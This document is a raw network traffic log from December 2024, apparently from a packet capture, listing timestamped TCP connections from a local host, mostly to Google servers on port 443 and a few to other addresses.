                                                                                                                                                                    Dec 30, 2024 04:59:14.813929081 CET44349781142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:14.824613094 CET49781443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:14.824618101 CET44349781142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:14.836811066 CET49780443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:14.836821079 CET44349780142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:14.837065935 CET49780443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:14.837073088 CET44349780142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:15.092746019 CET44349782142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:15.092813015 CET49782443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:15.092823029 CET44349782142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:15.092865944 CET49782443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:15.093835115 CET44349782142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:15.093866110 CET44349782142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:15.093887091 CET49782443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:16.799953938 CET44349795142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:16.800142050 CET44349795142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:16.800209045 CET49795443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:16.800745010 CET49795443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:16.819551945 CET44349796142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:16.819906950 CET49796443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:16.819906950 CET49796443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:16.819928885 CET44349796142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:16.820262909 CET49796443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:16.820266962 CET44349796142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:16.835335970 CET44349794142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:16.847326994 CET44349795142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:16.969693899 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:17.040805101 CET44349797142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.042741060 CET49797443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:17.058172941 CET49797443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:17.058182001 CET44349797142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.058214903 CET49797443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:17.058221102 CET44349797142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.104778051 CET4979380192.168.2.4180.163.251.230
                                                                                                                                                                    Dec 30, 2024 04:59:17.110002041 CET8049793180.163.251.230192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.159109116 CET44349794142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.159738064 CET44349794142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.160938978 CET49794443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:17.160938978 CET49794443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:17.164882898 CET49798443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:17.164908886 CET44349798142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.166764975 CET44349795142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.166866064 CET49798443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:17.166867971 CET49795443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:17.166878939 CET44349795142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.166971922 CET49795443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:17.166971922 CET49795443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:17.166991949 CET44349795142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.167097092 CET49795443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:17.167102098 CET49798443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:17.167110920 CET44349798142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.167682886 CET49799443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:17.167721033 CET44349799142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.172879934 CET49799443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:17.173940897 CET49799443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:17.173958063 CET44349799142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.267941952 CET44349796142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.267982006 CET44349796142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.268066883 CET49796443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:17.268066883 CET49796443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:17.268076897 CET44349796142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.268363953 CET49796443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:17.268852949 CET49796443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:17.268868923 CET44349796142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.269349098 CET49800443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:17.269371986 CET44349800142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.269442081 CET49800443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:17.269630909 CET49800443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:17.269643068 CET44349800142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.408907890 CET8049793180.163.251.230192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.409043074 CET4979380192.168.2.4180.163.251.230
                                                                                                                                                                    Dec 30, 2024 04:59:17.449501991 CET44349797142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.449584961 CET44349797142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.449614048 CET49797443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:17.449625015 CET44349797142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.449649096 CET49797443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:17.449701071 CET44349797142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.449878931 CET49797443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:17.450706005 CET49797443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:17.450711012 CET49801443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:17.450715065 CET44349797142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.450773954 CET44349801142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.450907946 CET49801443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:17.451705933 CET49801443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:17.451731920 CET44349801142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.484441996 CET49794443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:17.484467030 CET44349794142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.648430109 CET4979380192.168.2.4180.163.251.230
                                                                                                                                                                    Dec 30, 2024 04:59:17.653280973 CET8049793180.163.251.230192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.653928995 CET4977480192.168.2.4180.163.251.230
                                                                                                                                                                    Dec 30, 2024 04:59:17.658751011 CET8049774180.163.251.230192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.801007986 CET44349799142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.801069975 CET49799443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:17.801656008 CET44349799142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.801723003 CET49799443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:17.801736116 CET44349798142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.801812887 CET49798443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:17.803246975 CET49799443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:17.803257942 CET44349799142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.803466082 CET44349799142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.803538084 CET49799443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:17.803946018 CET49799443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:17.803950071 CET44349798142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.803994894 CET49798443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:17.805358887 CET49798443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:17.805366039 CET44349798142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.805705070 CET44349798142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.805758953 CET49798443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:17.806049109 CET49798443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:17.851320028 CET44349798142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.851342916 CET44349799142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.890326023 CET44349800142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.890383959 CET49800443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:17.890722036 CET49800443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:17.890727997 CET44349800142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.892896891 CET49800443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:17.892900944 CET44349800142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.952276945 CET8049793180.163.251.230192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.952326059 CET4979380192.168.2.4180.163.251.230
                                                                                                                                                                    Dec 30, 2024 04:59:17.961636066 CET8049774180.163.251.230192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:17.961690903 CET4977480192.168.2.4180.163.251.230
                                                                                                                                                                    Dec 30, 2024 04:59:18.047142029 CET49801443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:18.047346115 CET49799443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:18.047365904 CET49798443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:18.047386885 CET49800443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:18.051295996 CET49803443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:18.051326990 CET44349803142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:18.051502943 CET49803443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:18.064244032 CET49803443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:18.064255953 CET44349803142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:18.064830065 CET49804443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:18.064856052 CET44349804142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:18.065133095 CET49804443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:20.323600054 CET44349813142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:20.323744059 CET44349813142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:20.323801041 CET49813443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:20.323801041 CET49813443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:20.324028015 CET49819443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:20.324040890 CET44349819142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:20.324832916 CET49819443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:20.325031996 CET49819443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:20.325042963 CET44349819142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:20.441509008 CET4977480192.168.2.4180.163.251.230
                                                                                                                                                                    Dec 30, 2024 04:59:20.446536064 CET8049774180.163.251.230192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:20.489299059 CET8049793180.163.251.230192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:20.489367962 CET4979380192.168.2.4180.163.251.230
                                                                                                                                                                    Dec 30, 2024 04:59:20.750931978 CET8049774180.163.251.230192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:20.750994921 CET4977480192.168.2.4180.163.251.230
                                                                                                                                                                    Dec 30, 2024 04:59:20.888144970 CET44349817142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:20.888206959 CET49817443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:20.888667107 CET49817443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:20.888695002 CET44349817142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:20.889780998 CET44349816142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:20.889847994 CET49816443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:20.891081095 CET49817443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:20.891093016 CET44349817142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:20.891355038 CET49816443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:20.891364098 CET44349816142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:20.891566038 CET44349816142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:20.891619921 CET49816443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:20.892010927 CET49816443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:20.912903070 CET44349818142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:20.912959099 CET49818443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:20.913268089 CET49818443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:20.913274050 CET44349818142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:20.913412094 CET49818443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:20.913414955 CET44349818142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:20.939332008 CET44349816142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:20.982245922 CET44349819142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:20.982295990 CET49819443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:20.986738920 CET49819443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:20.986746073 CET44349819142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:20.987011909 CET44349819142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:20.987070084 CET49819443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:20.988208055 CET49819443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:21.031354904 CET44349819142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.305310965 CET44349816142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.305350065 CET44349816142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.305361986 CET49816443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:21.305391073 CET44349816142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.305402994 CET49816443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:21.305432081 CET49816443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:21.305438042 CET44349816142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.305447102 CET44349816142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.305483103 CET49816443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:21.306576967 CET49816443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:21.306591988 CET44349816142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.350179911 CET44349817142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.350241899 CET49817443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:21.350941896 CET44349817142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.350975990 CET44349817142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.350990057 CET49817443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:21.351017952 CET49817443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:21.351548910 CET49817443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:21.351548910 CET49817443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:21.351593971 CET44349817142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.351634979 CET49817443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:21.352307081 CET49821443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:21.352332115 CET44349821142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.352387905 CET49821443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:21.352674007 CET49821443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:21.352684975 CET44349821142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.359209061 CET49822443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:21.359231949 CET44349822142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.359292030 CET49822443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:21.359570026 CET49822443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:21.359582901 CET44349822142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.381093979 CET44349818142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.381141901 CET49818443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:21.381269932 CET49818443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:21.381300926 CET44349818142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.381339073 CET49818443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:21.381715059 CET49824443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:21.381727934 CET44349824142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.381777048 CET49824443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:21.381936073 CET49824443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:21.381944895 CET44349824142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.453536987 CET44349819142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.453584909 CET49819443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:21.453591108 CET44349819142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.453600883 CET44349819142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.453638077 CET49819443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:21.453650951 CET49819443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:21.453658104 CET44349819142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.453691006 CET49819443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:21.453696012 CET44349819142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.453726053 CET44349819142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.453733921 CET49819443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:21.453763008 CET49819443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:21.453994036 CET49819443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:21.453999043 CET44349819142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.454370022 CET49825443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:21.454391956 CET44349825142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.454443932 CET49825443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:21.454581976 CET49825443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:21.454593897 CET44349825142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.966573954 CET44349822142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.966703892 CET49822443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:21.968794107 CET49822443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:21.968799114 CET44349822142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.970788956 CET49822443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:21.970793009 CET44349822142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.978127003 CET44349821142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.978148937 CET44349824142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.978238106 CET49821443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:21.978287935 CET49824443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:21.978794098 CET44349824142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.978935957 CET49824443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:21.980617046 CET49824443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:21.980622053 CET44349824142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.980817080 CET44349824142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:21.980818987 CET44349821142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:24.374521971 CET44349830142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:24.374653101 CET49830443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:24.374722004 CET44349830142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:24.374752998 CET44349830142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:24.374778032 CET49830443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:24.374957085 CET49830443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:24.375334024 CET49830443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:24.375334024 CET49830443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:24.375341892 CET44349830142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:24.375925064 CET49830443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:24.703794003 CET44349832142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:24.703864098 CET49832443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:24.703877926 CET44349832142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:24.703927994 CET49832443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:24.703934908 CET44349832142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:24.703952074 CET44349832142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:24.703974009 CET49832443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:24.704000950 CET49832443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:24.705076933 CET49832443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:24.705085039 CET44349832142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:24.705560923 CET49838443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:24.705574989 CET44349838142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:24.705615044 CET49839443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:24.705630064 CET44349839142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:24.705646038 CET49838443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:24.705684900 CET49839443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:24.705869913 CET49839443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:24.705881119 CET44349839142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:24.705940962 CET49838443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:24.705950022 CET44349838142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:24.930844069 CET44349835142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:24.930916071 CET49835443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:24.931248903 CET44349836142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:24.931303024 CET49836443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:24.931708097 CET44349835142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:24.931761980 CET49835443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:24.936605930 CET49835443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:24.936630964 CET44349835142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:24.936939955 CET44349835142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:24.936999083 CET49835443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:24.937258959 CET49836443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:24.937263966 CET44349836142.250.186.129192.168.2.4
